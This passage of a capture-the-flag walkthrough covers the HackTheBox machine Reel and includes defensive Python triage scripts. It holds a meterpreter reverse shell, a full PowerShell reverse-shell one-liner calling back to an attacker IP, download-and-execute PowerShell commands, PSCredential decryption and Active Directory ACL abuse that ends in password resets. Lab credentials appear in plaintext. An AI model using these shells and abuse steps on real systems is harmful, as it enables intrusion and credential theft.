-- ---- ------- ------------
0 Exploit: windows/fileformat/office windows/meterpreter/reverse tcp://10.10.14.5:4444
_word_hta
I could send the email to “[email protected]”, attaching my precious msf.rtf file:
$ sendEmail -t [email protected] -f [email protected] -s 10.10.10.77 -u "Important subject" -m 'convert it for me please' -a msf.rtf
May 06 16:26:27 localhost sendEmail[17091]: Email was sent successfully!
It’s honestly funny the fact that I can send emails using the mailserver without having a valid account myself, no credentials whatsoever, just a random username. I never knew something like that is possible. Lesson learned!
After a few seconds, I got a hit in the webserver hosting the HTA file (from msfconsole) and the meterpreter session right after:
msf6 exploit(windows/fileformat/office_word_hta) >
[*] Sending stage (177734 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.77:50699) at 2025-05-06 16:26:48 -0300
To validate that I’m in fact in the victim machine, I ran those few commands:
msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows HTB\nico @ REEL 10.10.14.5:4444 -> 10.10.10.77:50699 (
10.10.10.77)
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
meterpreter > getuid
Server username: HTB\nico
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:50:56:b0:44:fa
MTU : 1500
IPv4 Address : 10.10.10.77
IPv4 Netmask : 255.255.255.0
IPv6 Address : dead:beef::10
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::391e:7631:e535:a302
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a0a:a4d
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
meterpreter >
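Seen from the mail gateway or the IR desk, the RTF that office_word_hta produces relies on an OLE link object that Word refreshes as soon as the document opens (the module’s own description above: an olelink object makes an HTTP request and runs the HTA it gets back). The following is an added example, mine rather than Metasploit’s generator or the writeup’s code: a static triage script that flags \objupdate on an \object group and decodes the hex \objdata payload to look for an ASCII or UTF-16LE URL. Both RTF samples are constructed and EXAMPLE-HOST is a placeholder; this is a heuristic, not a full RTF parser.

```python
#!/usr/bin/env python3
"""Static triage of an RTF attachment for an update-on-open OLE link that
points at a URL. Added example: not Metasploit's generator nor the writeup's
code. SUSPICIOUS_RTF and BENIGN_RTF are constructed and EXAMPLE-HOST is a
placeholder. Heuristic only; it is not a complete RTF parser."""
import re

# \objdata introduces the hex-encoded OLE payload inside an {\object} group
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9a-fA-F\s]+)")
ASCII_URL_RE = re.compile(rb"https?://[\x21-\x7e]+")
# the same URL when stored as UTF-16LE (every character followed by a NUL)
UTF16_URL_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def decode_objdata(rtf):
    """Return the raw bytes of every \\objdata hex blob in the document."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(r"\s+", "", m.group(1))
        if len(hexstr) % 2:          # tolerate a truncated last nibble
            hexstr = hexstr[:-1]
        blobs.append(bytes.fromhex(hexstr))
    return blobs


def find_urls(blob):
    """URLs embedded in an OLE payload, in either ASCII or UTF-16LE."""
    urls = {m.group(0).decode("ascii") for m in ASCII_URL_RE.finditer(blob)}
    urls |= {m.group(0).decode("utf-16-le") for m in UTF16_URL_RE.finditer(blob)}
    return sorted(urls)


def triage_rtf(rtf):
    """Flag the combination that matters: \\objupdate (Word refreshes the
    object when the file opens) plus a URL inside the object data."""
    findings = {
        "has_object": "\\object" in rtf,
        "objupdate": "\\objupdate" in rtf,
        "objautlink": "\\objautlink" in rtf,
        "urls": [],
    }
    for blob in decode_objdata(rtf):
        findings["urls"].extend(find_urls(blob))
    findings["suspicious"] = findings["objupdate"] and bool(findings["urls"])
    return findings


# Constructed samples. The suspicious one only mimics the shape of an OLE2Link
# object whose target URL is stored as UTF-16LE; real samples carry a full
# OLE stream around it.
SUSPICIOUS_RTF = (
    r"{\rtf1{\object\objautlink\objupdate\objw100\objh100{\*\objdata "
    + (b"OLE2Link" + "http://EXAMPLE-HOST/payload.hta".encode("utf-16-le")).hex()
    + r"}}}"
)
BENIGN_RTF = (
    r"{\rtf1{\object\objemb\objw100\objh100{\*\objdata "
    + b"Package\x00\x01\x02".hex()
    + r"}}}"
)

if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, triage_rtf(sample))
```

The benign sample has an embedded object but no update-on-open flag and no URL, so it scores clean; an ordinary embedded object with \objupdate but no URL would also pass, which keeps the rule narrow enough for a gateway.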
Horizontal Privilege Escalation: nico -> tom
Summary
On Nico’s desktop, cred.xml held an encrypted PSCredential. We spun up a PowerShell reverse shell, decrypted it to get Tom’s password (`1ts-mag1c!!!`), and logged in as Tom.
Details
In my meterpreter session, I began enumerating folders that “nico” is owner of, until I landed on their Desktop folder:
meterpreter > ls
Listing: C:\users\nico\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 1468 fil 2017-10-27 21:59:16 -0200 cred.xml
100666/rw-rw-rw- 282 fil 2017-10-27 20:42:45 -0200 desktop.ini
100444/r--r--r-- 34 fil 2025-05-05 12:38:47 -0300 user.txt
100777/rwxrwxrwx 10144768 fil 2025-05-05 16:58:36 -0300 win.exe
100666/rw-rw-rw- 162 fil 2017-10-27 19:34:38 -0200 ~$iledDeliveryNotification.doc
Reading the contents of cred.xml revealed that the file is a PSCredential object in XML format for system user Tom:
meterpreter > cat cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
Because I can’t really use powershell in this meterpreter session, I had to downgrade to a normal powershell session.
I did grab the powershell reverse shell (one liner) from Nishang. It looks like this (saved as revshell.ps1):
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Then, I launched a simple python http server to serve my revshell.ps1:
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
In my meterpreter session, I dropped to a system shell:
meterpreter > shell
Process 1568 created.
Channel 14 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\users\nico\Desktop>
In another terminal in my local machine, I set up netcat to listen for connections on port 1337 (the port I chose on the reverse shell script revshell.ps1):
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
Then, from the system shell in Meterpreter, I ran the following to fetch the PowerShell reverse shell from my HTTP server and execute it straight away (-exec bypass sidesteps the execution policy, and the Proxy.Credentials line only matters if the host has to go through an authenticated proxy):
C:\users\nico\Desktop>powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.14.5/revshell.ps1')|iex"
Instantly, I received the http GET request grabbing the powershell reverse shell:
10.10.10.77 - - [07/May/2025 17:21:26] "GET /revshell.ps1 HTTP/1.1" 200 -
And got a session on my netcat listener:
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.77] 65523
PS C:\users\nico\Desktop>
In the new PowerShell session, which runs as nico on the same host, I decrypted the password from the PSCredential XML. Export-Clixml protects the SecureString with DPAPI under the exporting user's master key, so it only decrypts as that user on that machine, which is exactly the context this shell provides:
PS C:\users\nico\Desktop> $encryptedPassword = Import-Clixml -Path 'C:\users\nico\desktop\cred.xml'
PS C:\users\nico\Desktop> $decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
PS C:\users\nico\Desktop> $decryptedPassword
1ts-mag1c!!!
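As an added example (not part of the writeup), here is a small Python triage script for a cred.xml recovered from a box when you do not yet have a shell as the owning user. It parses the CLIXML, checks whether the SecureString is a DPAPI blob or the key-encrypted form that ConvertFrom-SecureString -Key produces (which decrypts anywhere the key is found), and walks the DPAPI blob header to report the master key GUID, which tells you which file under the user's Protect directory an offline decryption (for example with impacket's dpapi.py) would need. The sample input is the cred.xml shown above; the protection labels and the "needs" wording are this script's own.

```python
"""Triage a PowerShell Export-Clixml credential without a session as the owning user.
Added example, not from the writeup: parses the CLIXML, pulls UserName and the
SecureString, and if that is a DPAPI blob walks its header to report which master
key (and so which user's password) an offline decryption would need."""
import struct
import uuid
import xml.etree.ElementTree as ET

PS_NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}
# Provider GUID every CryptProtectData blob carries right after its version DWORD.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# ConvertFrom-SecureString -Key/-SecureKey output starts with this marker instead:
# AES under a caller-supplied key, so it decrypts wherever that key is recovered.
KEYED_MARKER = "76492d1116743f0423413b16050a5345"
CRYPTPROTECT_LOCAL_MACHINE = 0x4
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}

# The cred.xml recovered from nico's desktop, exactly as shown above.
CRED_XML = r"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>"""


def parse_clixml_credential(text):
    """Return (username, secure_string_text) from a PSCredential written by Export-Clixml."""
    root = ET.fromstring(text)
    user = root.find(".//ps:S[@N='UserName']", PS_NS).text
    secure = root.find(".//ps:SS[@N='Password']", PS_NS).text.strip()
    return user, secure


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _lp(buf, off):
    """A DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    return buf[off:off + n], off + n


def parse_dpapi_blob(blob):
    """Walk the DPAPI blob layout (the same layout impacket's dpapi.py and mimikatz parse)."""
    version, off = _u32(blob, 0)
    provider = uuid.UUID(bytes_le=blob[off:off + 16]); off += 16
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    off += 4                                    # master key version, always 1
    master_key = uuid.UUID(bytes_le=blob[off:off + 16]); off += 16
    flags, off = _u32(blob, off)
    description, off = _lp(blob, off)           # UTF-16LE, usually just a NUL
    crypt_alg, crypt_bits = struct.unpack_from("<II", blob, off); off += 8
    salt, off = _lp(blob, off)
    _hmac_key, off = _lp(blob, off)
    hash_alg, _hash_bits = struct.unpack_from("<II", blob, off); off += 8
    _hmac2_key, off = _lp(blob, off)
    ciphertext, off = _lp(blob, off)
    _signature, off = _lp(blob, off)
    if off != len(blob):
        raise ValueError(f"{len(blob) - off} trailing bytes after the DPAPI signature")
    return {
        "provider_guid": str(provider),
        "master_key_guid": str(master_key),
        "flags": flags,
        "description": description.decode("utf-16-le").rstrip("\x00"),
        "crypt_alg": ALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "crypt_bits": crypt_bits,
        "hash_alg": ALG_NAMES.get(hash_alg, hex(hash_alg)),
        "salt_hex": salt.hex(),
        "data_len": len(ciphertext),
    }


def triage(text):
    """Classify the credential file and say what decrypting it would take."""
    user, secure = parse_clixml_credential(text)
    result = {"username": user}
    if secure.startswith(KEYED_MARKER):
        result["protection"] = "aes-supplied-key"
        result["needs"] = "the -Key/-SecureKey value, usually in the script that wrote the file"
        return result
    info = parse_dpapi_blob(bytes.fromhex(secure))
    result.update(info)
    if info["flags"] & CRYPTPROTECT_LOCAL_MACHINE:
        result["protection"] = "dpapi-machine"
        result["needs"] = "SYSTEM on this host (machine master key)"
    else:
        result["protection"] = "dpapi-user"
        result["needs"] = ("a session as that user on that host (Import-Clixml), or the master key file "
                           "%APPDATA%\\Microsoft\\Protect\\<SID>\\" + info["master_key_guid"]
                           + " plus that user's password or NT hash")
    return result


if __name__ == "__main__":
    for key, value in triage(CRED_XML).items():
        print(f"{key:16} {value}")
```

For the blob above this reports a user-scoped DPAPI blob (flags 0), 3DES/SHA1, a 32-byte ciphertext (the UTF-16 password padded to a 3DES block boundary) and master key c77ba0e4-eaaa-47de-925c-42c8be587073; without tom's or nico's shell you would need that master key file plus the owner's password to get any further, which is why dropping into a PowerShell session as nico was the shortest path.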
With cleartext credentials for the domain user tom, I checked that they are valid with NetExec:
$ nxc smb 10.10.10.77 -u tom -p '1ts-mag1c!!!'
SMB 10.10.10.77 445 REEL [*] Windows 8.1 / Server 2012 R2 Build 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [+] HTB.LOCAL\tom:1ts-mag1c!!!
And I could log in via SSH as well:
$ ssh tom@10.10.10.77
The authenticity of host '10.10.10.77 (10.10.10.77)' can't be established.
ED25519 key fingerprint is SHA256:fIZnS9nEVF3o86fEm/EKspTgedBr8TvFR0i3Pzk40EQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.77' (ED25519) to the list of known hosts.
tom@10.10.10.77's password: 1ts-mag1c!!!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>
Horizontal Privilege Escalation: tom -> claire
Summary
PowerView showed Tom had WriteOwner on Claire's AD object. We seized ownership, reset her password to SuperSecurePass123!, and SSH'd in as Claire.
Details
Wandering through tom's files, I found an AD Audit folder containing interesting notes:
PS C:\users\tom\desktop\AD Audit> dir
Directory: C:\users\tom\desktop\AD Audit
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 5/30/2018 12:44 AM BloodHound
-ar-- 5/29/2018 9:02 PM 182 note.txt
PS C:\users\tom\desktop\AD Audit> type .\note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
I transferred the latest SharpHound collector to the machine:
scp SharpHound.exe tom@10.10.10.77:'C:\windows\temp\sharphound.exe'
and ran it, but the executable is blocked by AppLocker ("This program is blocked by group policy"), even in commonly writable locations like C:\Windows\temp:
PS C:\Windows\temp> .\sharphound.exe
Program 'sharphound.exe' failed to run: This program is blocked by group policy. For more
information, contact your system administratorAt line:1 char:1
+ ..\documents\sharphound.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ..\documents\sharphound.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Or even the powershell version:
PS C:\Users\tom\desktop> powershell.exe -ep bypass -C "IEX(New-Object Net.Webclient).DownloadString('http://10.10.14.15/SharpHound.ps1');Invoke-BloodHound"
Exception calling "Invoke" with "2" argument(s): "Method not found: '!!0[]
System.Array.Empty()'."
At line:421 char:88
+ ... nvoke($Null, @(,$passed))
+ ~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : MissingMethodException
Neither worked: AppLocker blocks the binary, and the PowerShell collector dies inside its reflective loader because System.Array.Empty only exists in .NET Framework 4.6 and later, so this host runs an older runtime. I therefore enumerated the domain manually with PowerView, looking for ACEs whose trustee is tom:
PS C:\Users\tom\desktop> import-module .\powerview.ps1
PS C:\Users\tom\desktop> $sid = Convert-NameToSid tom
PS C:\Users\tom\desktop> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ObjectDN : CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL
ObjectSID : S-1-5-21-2648318136-3688571242-2924127574-1130
ActiveDirectoryRights : WriteOwner
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 524288
SecurityIdentifier : S-1-5-21-2648318136-3688571242-2924127574-1107
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
So tom (our current user) has WriteOwner over claire's user object. On its own WriteOwner only lets us change the owner, but an object's owner implicitly holds WRITE_DAC, so the chain is: make tom the owner, rewrite the DACL to grant tom full control, then reset claire's password:
PS C:\Users\tom\desktop> Set-DomainObjectOwner -Identity 'claire' -OwnerIdentity 'tom'
PS C:\Users\tom\desktop> Add-DomainObjectAcl -Rights 'All' -TargetIdentity "claire" -PrincipalIdentity "tom"
PS C:\Users\tom\desktop> net user claire SuperSecurePass123!
The command completed successfully.
And I was able to log in as claire over SSH with the newly set password:
$ ssh claire@10.10.10.77
claire@10.10.10.77's password: SuperSecurePass123!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
claire@REEL C:\Users\claire>whoami
htb\claire
claire@REEL C:\Users\claire>
Vertical Privilege Escalation: claire -> administrator
Summary
Claire had WriteDACL on the Backup_Admins group. We added her, ran winPEAS to find stored credentials, accessed the Administrator folder, and discovered the admin password (Cr4ckMeIfYouC4n!) in a backup script, then SSH'd in as Administrator.
Details
I performed the same manual enumeration for ACLs as I did earlier for “tom” but this time for “claire”:
PS C:\Users\tom\desktop> import-module .\powerview.ps1
PS C:\Users\tom\desktop> $sid = Convert-NameToSid claire
PS C:\Users\tom\desktop> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ObjectDN : CN=Backup_Admins,OU=Groups,DC=HTB,DC=LOCAL
ObjectSID : S-1-5-21-2648318136-3688571242-2924127574-1135
ActiveDirectoryRights : ReadProperty, WriteProperty, GenericExecute, WriteDacl
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 393268
SecurityIdentifier : S-1-5-21-2648318136-3688571242-2924127574-1130
AceType : AccessAllowed
AceFlags : ContainerInherit
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : None
AuditFlags : None
So claire has WriteDacl over the Backup_Admins group. To abuse it, I logged in as claire over SSH and imported PowerView again under that account:
PS C:\Users\claire\Desktop> import-module .\powerview.ps1
With WriteDacl, claire can rewrite the group's DACL to grant herself WriteMembers (write access to the member attribute) and then add herself to the group. Strictly, the ACE above is a plain AccessAllowed ACE rather than an object-specific one, so its WriteProperty already covers every attribute including member; granting WriteMembers explicitly just makes the step unambiguous:
PS C:\Users\claire\Desktop> Add-DomainObjectAcl -Rights 'WriteMembers' -TargetIdentity "Backup_Admins" -PrincipalIdentity "claire"
PS C:\Users\claire\Desktop> Add-DomainGroupMember -Identity "Backup_Admins" -Members "claire"
Just to make sure claire is now a member of the group, I ran net group; the "already a member" error confirms it:
PS C:\Users\claire\Desktop> net group "Backup_Admins" claire /add /domain
User claire is already a member of group Backup_Admins.
More help is available by typing NET HELPMSG 3754.
PS C:\Users\claire\Desktop>
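The two ACEs found above (tom's WriteOwner over claire, claire's WriteDacl over Backup_Admins) came out of PowerView as raw AccessMask values, 524288 and 393268. As an added example that is not part of the writeup, here is a Python decoder that renders such a mask the way .NET's ActiveDirectoryRights enum does (which is why PowerView prints GenericExecute rather than ReadControl plus ListChildren) and maps each decoded right to the abuse step used on this box. The ABUSE table's wording is this example's own summary of the PowerView commands shown above.

```python
"""Decode an AD ACE AccessMask the way .NET's ActiveDirectoryRights enum prints it,
then map the rights to the ACL-abuse primitive they enable.
Added example, not from the writeup; the masks in main() are the two ACEs PowerView returned."""

# System.DirectoryServices.ActiveDirectoryRights: value -> name (composite values included).
AD_RIGHTS = {
    0x00000001: "CreateChild",
    0x00000002: "DeleteChild",
    0x00000004: "ListChildren",
    0x00000008: "Self",
    0x00000010: "ReadProperty",
    0x00000020: "WriteProperty",
    0x00000040: "DeleteTree",
    0x00000080: "ListObject",
    0x00000100: "ExtendedRight",
    0x00010000: "Delete",
    0x00020000: "ReadControl",
    0x00020004: "GenericExecute",   # ReadControl | ListChildren
    0x00020028: "GenericWrite",     # ReadControl | WriteProperty | Self
    0x00020094: "GenericRead",      # ReadControl | ReadProperty | ListChildren | ListObject
    0x00040000: "WriteDacl",
    0x00080000: "WriteOwner",
    0x000F01FF: "GenericAll",
    0x00100000: "Synchronize",
    0x01000000: "AccessSystemSecurity",
}

# What each decoded right buys an attacker, phrased as the PowerView steps used on this box.
ABUSE = {
    "GenericAll": "full control: reset the password or add a member directly",
    "WriteOwner": "Set-DomainObjectOwner, then Add-DomainObjectAcl -Rights All, then reset the password",
    "WriteDacl": "Add-DomainObjectAcl -Rights WriteMembers (group) or All (user), then Add-DomainGroupMember / reset the password",
    "GenericWrite": "write any attribute (member on a group, scriptPath or an SPN on a user)",
    "WriteProperty": "write the attributes the ACE covers; a non-object ACE covers all of them, member included",
    "ExtendedRight": "control-access rights such as User-Force-Change-Password, depending on ObjectAceType",
}


def decode_rights(mask):
    """Reproduce Enum.ToString() for a [Flags] enum: consume values from the largest down,
    then report the matched names in ascending value order (the order PowerView shows)."""
    remaining = mask
    matched = []
    for value in sorted(AD_RIGHTS, reverse=True):
        if (remaining & value) == value:
            matched.append(value)
            remaining &= ~value
    names = [AD_RIGHTS[v] for v in sorted(matched)]
    if remaining:                       # bits outside the enum: show them raw
        names.append(hex(remaining))
    return names or ["None"]


def abuse_paths(mask, object_specific=False):
    """Rights in the mask that hand over control of the object, with the matching abuse step.
    object_specific=True means AceType was AccessAllowedObject, so WriteProperty and
    ExtendedRight are limited to the attribute or control right named in ObjectAceType."""
    paths = {}
    for name in decode_rights(mask):
        if name in ABUSE:
            note = ABUSE[name]
            if object_specific and name in ("WriteProperty", "ExtendedRight"):
                note += " (scoped by ObjectAceType, check it)"
            paths[name] = note
    return paths


if __name__ == "__main__":
    for who, mask in (("tom -> claire", 524288), ("claire -> Backup_Admins", 393268)):
        print(who, decode_rights(mask), abuse_paths(mask))
```

Run against 393268 the decoder gives ReadProperty, WriteProperty, GenericExecute, WriteDacl, exactly the PowerView line above; the interesting detail is that both WriteDacl and the unscoped WriteProperty are independent routes to group membership, so either one would have done.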
I didn't know what this group was for, but since the name suggests backups I tried impacket-secretsdump from my Linux machine straight away, without success:
$ secretsdump.py claire@10.10.10.77
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: timed out
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning
I also tried it by hand, saving the registry hives with reg save, but that fails too. Backup_Admins is a custom group (it sits in OU=Groups), not the built-in Backup Operators, so membership does not carry SeBackupPrivilege, which is exactly what "A required privilege is not held by the client" says:
PS C:\Users\claire\Desktop> reg save hklm\system C:\Users\claire\Documents\system
ERROR: A required privilege is not held by the client.
PS C:\Users\claire\Desktop> reg save hklm\security C:\Users\claire\Documents\security
ERROR: Access is denied.
To find out what this group is for, I disconnected from my SSH session as claire and logged in again: group membership is stamped into the access token at logon, so the existing session knew nothing about Backup_Admins. Then I transferred winpeas.ps1 to the victim machine and ran it. Among the output, its Winlogon check (the autologon values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) revealed a password for the domain user nico:
=========|| Additonal Winlogon Credentials Check
HTB
nico
4dri@na2017!**
The credentials being:
nico:4dri@na2017!**
Also among the winPEAS results: now that the session carries the Backup_Admins membership, claire can read the Administrator profile at C:\users\administrator:
claire@REEL C:\Users\claire>cd C:\users\Administrator
claire@REEL C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\Administrator
02/17/2018 12:29 AM <DIR> .
02/17/2018 12:29 AM <DIR> ..
10/28/2017 12:14 AM <DIR> .config
10/28/2017 12:28 AM <DIR> .oracle_jre_usage
10/28/2017 12:00 AM <DIR> Contacts
01/21/2018 03:56 PM <DIR> Desktop
05/29/2018 10:19 PM <DIR> Documents
02/17/2018 12:29 AM <DIR> Downloads
10/28/2017 12:00 AM <DIR> Favorites
10/28/2017 12:00 AM <DIR> Links
10/28/2017 12:00 AM <DIR> Music
10/26/2017 09:20 PM <DIR> OneDrive
10/31/2017 10:38 PM <DIR> Pictures
10/28/2017 12:00 AM <DIR> Saved Games
10/28/2017 12:00 AM <DIR> Searches
10/28/2017 12:00 AM <DIR> Videos
0 File(s) 0 bytes
16 Dir(s) 4,976,623,616 bytes free
claire@REEL C:\Users\Administrator>
Unfortunately, the box isn’t over yet as I can’t read root.txt:
claire@REEL C:\Users\Administrator\Desktop>type root.txt
Access is denied.
However, in Administrator’s user desktop, there’s a “Backup Scripts” folder:
claire@REEL C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\Administrator\Desktop
01/21/2018 03:56 PM <DIR> .
01/21/2018 03:56 PM <DIR> ..
11/02/2017 10:47 PM <DIR> Backup Scripts
05/11/2025 02:36 PM 34 root.txt
1 File(s) 34 bytes
3 Dir(s) 4,976,623,616 bytes free
There are a bunch of different backup scripts:
Directory of C:\Users\Administrator\Desktop\Backup Scripts
11/02/2017 10:47 PM <DIR> .
11/02/2017 10:47 PM <DIR> ..
11/04/2017 12:22 AM 845 backup.ps1
11/02/2017 10:37 PM 462 backup1.ps1
11/04/2017 12:21 AM 5,642 BackupScript.ps1
11/02/2017 10:43 PM 2,791 BackupScript.zip
11/04/2017 12:22 AM 1,855 folders-system-state.txt
11/04/2017 12:22 AM 308 test2.ps1.txt
6 File(s) 11,903 bytes
2 Dir(s) 4,976,623,616 bytes free
I had read access to all of them, so I went through each one. The first lines of BackupScript.ps1 have the admin password hard-coded:
claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1
# admin password
$password="Cr4ckMeIfYouC4n!"
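A hard-coded $password is the simplest form this takes, but the same sweep of a newly readable profile should also catch ConvertTo-SecureString -AsPlainText literals, Export-Clixml/Import-Clixml credential files like the cred.xml found earlier, net use with an inline password, and ConvertFrom-SecureString -Key (whose key sits in the script, so the blob decrypts offline). As an added example that is not part of the writeup, here is a small Python scanner for those patterns; SAMPLE_SCRIPT is constructed for the demo and only its first two lines are the real ones from BackupScript.ps1, the other credentials in it are made up.

```python
"""Sweep readable scripts for hard-coded or recoverable credentials.
Added example, not from the writeup. The patterns cover what turned up on this box
(a plain $password="..." assignment and an Export-Clixml credential file) plus a few
other common shapes. SAMPLE_SCRIPT is constructed; only its first two lines are real."""
import re
from pathlib import Path

# (kind, regex); the capture groups hold the evidence worth reporting.
PATTERNS = [
    ("plaintext-assignment",
     re.compile(r'\$\w*(?:pass(?:word|wd)?|pwd|secret|token)\w*\s*=\s*["\']([^"\']+)["\']', re.I)),
    ("asplaintext-securestring",
     re.compile(r'ConvertTo-SecureString\s+(?:-String\s+)?["\']([^"\']+)["\']\s+-AsPlainText', re.I)),
    ("clixml-credential",
     re.compile(r'(?:Import|Export)-Clixml\b[^\n]*?["\']?([^\s"\']+\.xml)', re.I)),
    ("net-use-password",
     re.compile(r'\bnet\s+use\b[^\n]*?/user:(\S+)\s+(\S+)', re.I)),
    ("keyed-securestring",            # AES with a key that is in the script: decryptable offline
     re.compile(r'ConvertFrom-SecureString\b[^\n]*?-(?:Secure)?Key\b', re.I)),
]
# test2.ps1.txt in the listing above is why .txt is included.
EXTENSIONS = {".ps1", ".psm1", ".bat", ".cmd", ".txt", ".xml"}

SAMPLE_SCRIPT = r'''# admin password
$password="Cr4ckMeIfYouC4n!"
$secure = ConvertTo-SecureString "Summer2017!" -AsPlainText -Force
$tom = Import-Clixml -Path C:\Users\nico\Desktop\cred.xml
net use \\backup\share /user:HTB\svc_backup B@ckup2017
$blob = $secure | ConvertFrom-SecureString -Key (1..16)
Write-Host "Backup done"
'''


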